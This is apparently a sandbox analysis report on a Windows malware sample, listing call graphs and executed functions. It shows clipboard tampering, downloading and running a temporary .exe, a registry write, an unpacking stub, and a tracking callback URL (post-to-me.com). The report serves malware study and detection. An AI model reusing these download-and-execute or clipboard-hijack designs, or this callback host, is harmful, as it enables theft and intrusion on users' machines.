65686->65685 65690 439844 EnterCriticalSection 65686->65690 65687 439821 __fread_nolock 65687->65614 65689 4397db 65689->65683 65729 4396c4 EnterCriticalSection 65689->65729 65690->65683 65691 439851 LeaveCriticalSection 65690->65691 65691->65686 65693->65630 65694->65626 65695->65621 65696->65620 65697->65626 65698->65635 65699->65626 65700->65631 65701->65639 65702->65637 65703->65638 65704->65642 65705->65653 65706->65648 65707->65651 65708->65653 65711 43cd67 65709->65711 65710 43cd82 65710->65669 65711->65710 65722 42eae9 20 API calls __dosmaperr 65711->65722 65713 43cda6 65723 42a5bd 26 API calls _Deallocate 65713->65723 65715 43cdb1 65715->65669 65716->65667 65717->65664 65718->65674 65719->65670 65720->65673 65721->65679 65722->65713 65723->65715 65724->65686 65730 42e455 LeaveCriticalSection 65725->65730 65727 4398ae 65727->65687 65728->65689 65729->65683 65730->65727 65731 43412a 65732 434136 BuildCatchObjectHelperInternal 65731->65732 65733 434142 65732->65733 65734 434159 65732->65734 65765 42eae9 20 API calls __dosmaperr 65733->65765 65744 42cb1f EnterCriticalSection 65734->65744 65737 434147 65766 42a5bd 26 API calls _Deallocate 65737->65766 65738 434169 65745 4341a6 65738->65745 65741 434175 65767 43419c LeaveCriticalSection __fread_nolock 65741->65767 65743 434152 __fread_nolock 65744->65738 65746 4341b4 65745->65746 65747 4341ce 65745->65747 65778 42eae9 20 API calls __dosmaperr 65746->65778 65768 432928 65747->65768 65750 4341b9 65779 42a5bd 26 API calls _Deallocate 65750->65779 65751 4341d7 65775 4347f3 65751->65775 65753 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65753->65741 65756 4342db 65758 43428e 65756->65758 65759 4342e8 65756->65759 65757 43425f 65757->65758 65760 43427c 65757->65760 65758->65753 65782 43433b 30 API calls 2 library calls 65758->65782 65781 42eae9 20 API calls __dosmaperr 65759->65781 65780 4344bf 31 API calls 4 library calls 65760->65780 65763 434286 65763->65753 65765->65737 65766->65743 65767->65743 65769 432934 65768->65769 65770 432949 65768->65770 65783 42eae9 20 API calls __dosmaperr 65769->65783 65770->65751 65772 432939 65784 42a5bd 26 API calls _Deallocate 65772->65784 65774 432944 65774->65751 65785 434670 65775->65785 65777 4341f3 65777->65753 65777->65756 65777->65757 65778->65750 65779->65753 65780->65763 65781->65753 65782->65753 65783->65772 65784->65774 65786 43467c BuildCatchObjectHelperInternal 65785->65786 65787 434684 65786->65787 65788 43469c 65786->65788 65820 42ead6 20 API calls __dosmaperr 65787->65820 65789 434750 65788->65789 65794 4346d4 65788->65794 65825 42ead6 20 API calls __dosmaperr 65789->65825 65792 434689 65821 42eae9 20 API calls __dosmaperr 65792->65821 65793 434755 65826 42eae9 20 API calls __dosmaperr 65793->65826 65810 4396c4 EnterCriticalSection 65794->65810 65798 434691 __fread_nolock 65798->65777 65799 43475d 65827 42a5bd 26 API calls _Deallocate 65799->65827 65800 4346da 65802 434713 65800->65802 65803 4346fe 65800->65803 65811 434775 65802->65811 65822 42eae9 20 API calls __dosmaperr 65803->65822 65806 434703 65823 42ead6 20 API calls __dosmaperr 65806->65823 65807 43470e 65824 434748 LeaveCriticalSection __wsopen_s 65807->65824 65810->65800 65828 439941 65811->65828 65813 434787 65814 4347a0 SetFilePointerEx 65813->65814 65815 43478f 65813->65815 65817 4347b8 GetLastError 65814->65817 65819 434794 65814->65819 65841 42eae9 20 API calls __dosmaperr 65815->65841 65842 42eab3 20 API calls __dosmaperr 65817->65842 65819->65807 65820->65792 65821->65798 65822->65806 65823->65807 65824->65798 65825->65793 65826->65799 65827->65798 65829 43994e 65828->65829 65831 439963 65828->65831 65843 42ead6 20 API calls __dosmaperr 65829->65843 65834 439988 65831->65834 65845 42ead6 20 API calls __dosmaperr 65831->65845 65833 439953 65844 42eae9 20 API calls __dosmaperr 65833->65844 65834->65813 65835 439993 65846 42eae9 20 API calls __dosmaperr 65835->65846 65838 43995b 65838->65813 65839 43999b 65847 42a5bd 26 API calls _Deallocate 65839->65847 65841->65819 65842->65819 65843->65833 65844->65838 65845->65835 65846->65839 65847->65838 65848 4023ba 65849 402581 PostQuitMessage 65848->65849 65850 4023ce 65848->65850 65854 40257f 65849->65854 65851 4023d5 DefWindowProcW 65850->65851 65852 4023ec 65850->65852 65851->65854 65853 402a14 167 API calls 65852->65853 65852->65854 65853->65854 65855 40fc2b 65856 40fc37 BuildCatchObjectHelperInternal 65855->65856 65884 410018 65856->65884 65858 40fd91 65905 4104f3 4 API calls 2 library calls 65858->65905 65860 40fc3e 65860->65858 65862 40fc68 65860->65862 65861 40fd98 65906 42ffe9 28 API calls _Atexit 65861->65906 65872 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65862->65872 65899 42fd0e 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 65862->65899 65864 40fd9e 65907 42ff9b 28 API calls _Atexit 65864->65907 65867 40fc81 65869 40fc87 65867->65869 65900 42fcb2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 65867->65900 65868 40fda6 65871 40fd08 65895 41060d 65871->65895 65872->65871 65901 42a386 167 API calls 4 library calls 65872->65901 65875 40fd0e 65876 40fd23 65875->65876 65902 410643 GetModuleHandleW 65876->65902 65878 40fd2a 65878->65861 65879 40fd2e 65878->65879 65880 40fd37 65879->65880 65903 42ff8c 28 API calls _Atexit 65879->65903 65904 4101a7 13 API calls 2 library calls 65880->65904 65883 40fd3f 65883->65869 65885 410021 65884->65885 65908 41079b IsProcessorFeaturePresent 65885->65908 65887 41002d 65909 428847 10 API calls 3 library calls 65887->65909 65889 410032 65890 410036 65889->65890 65910 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65889->65910 65890->65860 65892 41003f 65893 41004d 65892->65893 65911 428870 8 API calls 3 library calls 65892->65911 65893->65860 65912 426850 65895->65912 65898 410633 65898->65875 65899->65867 65900->65872 65901->65871 65902->65878 65903->65880 65904->65883 65905->65861 65906->65864 65907->65868 65908->65887 65909->65889 65910->65892 65911->65890 65913 410620 GetStartupInfoW 65912->65913 65913->65898 65914 2d294df 65915 2d294e9 65914->65915 65918 2d29ace 65915->65918 65919 2d29add 65918->65919 65922 2d2a26e 65919->65922 65923 2d2a289 65922->65923 65924 2d2a292 CreateToolhelp32Snapshot 65923->65924 65925 2d2a2ae Module32First 65923->65925 65924->65923 65924->65925 65926 2d29acd 65925->65926 65927 2d2a2bd 65925->65927 65929 2d29f2d 65927->65929 65930 2d29f58 65929->65930 65931 2d29fa1 65930->65931 65932 2d29f69 VirtualAlloc 65930->65932 65931->65931 65932->65931 65933 301003c 65934 3010049 65933->65934 65948 3010e0f SetErrorMode SetErrorMode 65934->65948 65939 3010265 65940 30102ce VirtualProtect 65939->65940 65942 301030b 65940->65942 65941 3010439 VirtualFree 65943 30105f4 LoadLibraryA 65941->65943 65946 30104be 65941->65946 65942->65941 65947 30108c7 65943->65947 65944 30104e3 LoadLibraryA 65944->65946 65946->65943 65946->65944 65949 3010223 65948->65949 65950 3010d90 65949->65950 65951 3010dad 65950->65951 65952 3010dbb GetPEB 65951->65952 65953 3010238 VirtualAlloc 65951->65953 65952->65953 65953->65939 65954 402bcd RegCreateKeyExW 65955 402bfb RegSetValueExW 65954->65955 65956 402c0f 65954->65956 65955->65956 65957 402c14 RegCloseKey 65956->65957 65958 402c1d 65956->65958 65957->65958

                                                  Executed Functions

                                                  Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                  • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                    • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                  • OpenClipboard.USER32(00000000), ref: 00401721
                                                  • GetClipboardData.USER32(00000001), ref: 00401731
                                                  • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                  • _strlen.LIBCMT ref: 0040174D
                                                  • _strlen.LIBCMT ref: 0040177C
                                                  • _strlen.LIBCMT ref: 004018C0
                                                  • EmptyClipboard.USER32 ref: 004018D6
                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                  • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                  • CloseClipboard.USER32 ref: 00401941
                                                  • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                  • String ID: i
                                                  • API String ID: 1583243082-3865851505
                                                  • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                  • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                  • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                  • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D
                                                  Function 00402A14 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                  • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                  • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                  • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                  • String ID: .exe$<$ShareScreen
                                                  • API String ID: 3323492106-493228180
                                                  • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                  • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                  • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                  • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                  Function 02D2A26E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A296
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02D2A2B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 1f231bf2031193c23c5343a4d13768c3191ab06ad8c134b837e448adf0801a81
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 7BF0F6321003307FD7203BF49C8CBAEB2E8EF5962CF205128E642911C0CB71EC098A60
                                                  Function 00432F49 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 74 432f49-432f59 75 432f73-432f75 74->75 76 432f5b-432f6e call 42ead6 call 42eae9 74->76 78 432f7b-432f81 75->78 79 4332dd-4332ea call 42ead6 call 42eae9 75->79 92 4332f5 76->92 78->79 82 432f87-432fb2 78->82 97 4332f0 call 42a5bd 79->97 82->79 85 432fb8-432fc1 82->85 88 432fc3-432fd6 call 42ead6 call 42eae9 85->88 89 432fdb-432fdd 85->89 88->97 90 432fe3-432fe7 89->90 91 4332d9-4332db 89->91 90->91 95 432fed-432ff1 90->95 96 4332f8-4332fd 91->96 92->96 95->88 99 432ff3-43300a 95->99 97->92 103 433027-433030 99->103 104 43300c-43300f 99->104 107 433032-433049 call 42ead6 call 42eae9 call 42a5bd 103->107 108 43304e-433058 103->108 105 433011-433017 104->105 106 433019-433022 104->106 105->106 105->107 111 4330c3-4330dd 106->111 136 433210 107->136 109 43305a-43305c 108->109 110 43305f-43307d call 4336c7 call 43348a * 2 108->110 109->110 144 43309a-4330c0 call 43480e 110->144 145 43307f-433095 call 42eae9 call 42ead6 110->145 113 4330e3-4330f3 111->113 114 4331b1-4331ba call 43d385 111->114 113->114 117 4330f9-4330fb 113->117 127 43322d 114->127 128 4331bc-4331ce 114->128 117->114 121 433101-433127 117->121 121->114 125 43312d-433140 121->125 125->114 130 433142-433144 125->130 132 433231-433249 ReadFile 127->132 128->127 133 4331d0-4331df GetConsoleMode 128->133 130->114 137 433146-433171 130->137 139 4332a5-4332b0 GetLastError 132->139 140 43324b-433251 132->140 133->127 135 4331e1-4331e5 133->135 135->132 141 4331e7-433201 ReadConsoleW 135->141 142 433213-43321d call 43348a 136->142 137->114 143 433173-433186 137->143 146 4332b2-4332c4 call 42eae9 call 42ead6 139->146 147 4332c9-4332cc 139->147 140->139 148 433253 140->148 149 433203 GetLastError 141->149 150 433222-43322b 141->150 142->96 143->114 154 433188-43318a 143->154 144->111 145->136 146->136 151 4332d2-4332d4 147->151 152 433209-43320f call 42eab3 147->152 158 433256-433268 148->158 149->152 150->158 151->142 152->136 154->114 163 43318c-4331ac 154->163 158->142 160 43326a-43326e 158->160 167 433270-433280 call 432c65 160->167 168 433287-433292 160->168 163->114 179 433283-433285 167->179 173 433294 call 432db5 168->173 174 43329e-4332a3 call 432aa5 168->174 180 433299-43329c 173->180 174->180 179->142 180->179
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                  • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                  • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                  • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69
                                                  Function 0043D05C Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 182 43d05c-43d08c call 43cdbf 185 43d0a7-43d0b3 call 43979e 182->185 186 43d08e-43d099 call 42ead6 182->186 191 43d0b5-43d0ca call 42ead6 call 42eae9 185->191 192 43d0cc-43d115 call 43cd2a 185->192 193 43d09b-43d0a2 call 42eae9 186->193 191->193 201 43d182-43d18b GetFileType 192->201 202 43d117-43d120 192->202 203 43d37e-43d384 193->203 204 43d1d4-43d1d7 201->204 205 43d18d-43d1be GetLastError call 42eab3 CloseHandle 201->205 207 43d122-43d126 202->207 208 43d157-43d17d GetLastError call 42eab3 202->208 211 43d1e0-43d1e6 204->211 212 43d1d9-43d1de 204->212 205->193 219 43d1c4-43d1cf call 42eae9 205->219 207->208 213 43d128-43d155 call 43cd2a 207->213 208->193 216 43d1ea-43d238 call 4396e7 211->216 217 43d1e8 211->217 212->216 213->201 213->208 224 43d23a-43d246 call 43cf3b 216->224 225 43d248-43d26c call 43cadd 216->225 217->216 219->193 224->225 231 43d270-43d27a call 4335ed 224->231 232 43d27f-43d2c2 225->232 233 43d26e 225->233 231->203 235 43d2e3-43d2f1 232->235 236 43d2c4-43d2c8 232->236 233->231 239 43d2f7-43d2fb 235->239 240 43d37c 235->240 236->235 238 43d2ca-43d2de 236->238 238->235 239->240 241 43d2fd-43d330 CloseHandle call 43cd2a 239->241 240->203 244 43d332-43d35e GetLastError call 42eab3 call 4398b0 241->244 245 43d364-43d378 241->245 244->245 245->240
                                                  APIs
                                                    • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                  • GetLastError.KERNEL32 ref: 0043D170
                                                  • __dosmaperr.LIBCMT ref: 0043D177
                                                  • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                  • GetLastError.KERNEL32 ref: 0043D18D
                                                  • __dosmaperr.LIBCMT ref: 0043D196
                                                  • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                  • CloseHandle.KERNEL32(?), ref: 0043D300
                                                  • GetLastError.KERNEL32 ref: 0043D332
                                                  • __dosmaperr.LIBCMT ref: 0043D339
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID:
                                                  • API String ID: 4237864984-0
                                                  • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                  • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                  • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                  • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A
                                                  Function 0301003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 250 301003c-3010047 251 3010049 250->251 252 301004c-3010263 call 3010a3f call 3010e0f call 3010d90 VirtualAlloc 250->252 251->252 267 3010265-3010289 call 3010a69 252->267 268 301028b-3010292 252->268 272 30102ce-30103c2 VirtualProtect call 3010cce call 3010ce7 267->272 269 30102a1-30102b0 268->269 271 30102b2-30102cc 269->271 269->272 271->269 279 30103d1-30103e0 272->279 280 30103e2-3010437 call 3010ce7 279->280 281 3010439-30104b8 VirtualFree 279->281 280->279 283 30105f4-30105fe 281->283 284 30104be-30104cd 281->284 285 3010604-301060d 283->285 286 301077f-3010789 283->286 288 30104d3-30104dd 284->288 285->286 290 3010613-3010637 285->290 292 30107a6-30107b0 286->292 293 301078b-30107a3 286->293 288->283 289 30104e3-3010505 LoadLibraryA 288->289 294 3010517-3010520 289->294 295 3010507-3010515 289->295 298 301063e-3010648 290->298 296 30107b6-30107cb 292->296 297 301086e-30108be LoadLibraryA 292->297 293->292 299 3010526-3010547 294->299 295->299 300 30107d2-30107d5 296->300 306 30108c7-30108f9 297->306 298->286 301 301064e-301065a 298->301 304 301054d-3010550 299->304 302 3010824-3010833 300->302 303 30107d7-30107e0 300->303 301->286 305 3010660-301066a 301->305 314 3010839-301083c 302->314 309 30107e2 303->309 310 30107e4-3010822 303->310 311 30105e0-30105ef 304->311 312 3010556-301056b 304->312 313 301067a-3010689 305->313 307 3010902-301091d 306->307 308 30108fb-3010901 306->308 308->307 309->302 310->300 311->288 315 301056d 312->315 316 301056f-301057a 312->316 317 3010750-301077a 313->317 318 301068f-30106b2 313->318 314->297 319 301083e-3010847 314->319 315->311 321 301059b-30105bb 316->321 322 301057c-3010599 316->322 317->298 323 30106b4-30106ed 318->323 324 30106ef-30106fc 318->324 325 3010849 319->325 326 301084b-301086c 319->326 333 30105bd-30105db 321->333 322->333 323->324 327 301074b 324->327 328 30106fe-3010748 324->328 325->297 326->314 327->313 328->327 333->304
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0301024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 29c64c42d0fe0b4c7d55ef4d3b42be360208fd60e8719feb5e79f70b48f41c0a
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: CF526975A01229DFDBA4CF58C984BADBBB1BF09304F1480D9E94DAB351DB30AA95CF14
                                                  Function 00402C24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen_wcslen
                                                  • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                  • API String ID: 3067768807-1501832161
                                                  • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                  • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                  • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                  • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E
                                                  Function 004051F5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                  • String ID: %X@
                                                  • API String ID: 1687354797-3313093589
                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69
                                                  Function 0042DFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread
                                                  • String ID: 11@$f(@
                                                  • API String ID: 1611280651-1277599000
                                                  • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                  • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                  • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                  • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68
                                                  Function 00405825 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                  • __Cnd_signal.LIBCPMT ref: 0040584D
                                                  • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                  • String ID:
                                                  • API String ID: 2059591211-0
                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D
                                                  Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 435 402980-4029eb call 426850 call 42a36b call 42b474 call 402843 444 4029f9-402a13 call 404358 call 40f8f4 435->444 445 4029ed-4029f0 435->445 445->444 446 4029f2-4029f6 445->446 446->444 448 4029f8 446->448 448->444
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 004029AF
                                                  • __fassign.LIBCMT ref: 004029BF
                                                    • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                  • String ID: 4+@
                                                  • API String ID: 2843524283-3700369575
                                                  • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                  • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                  • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
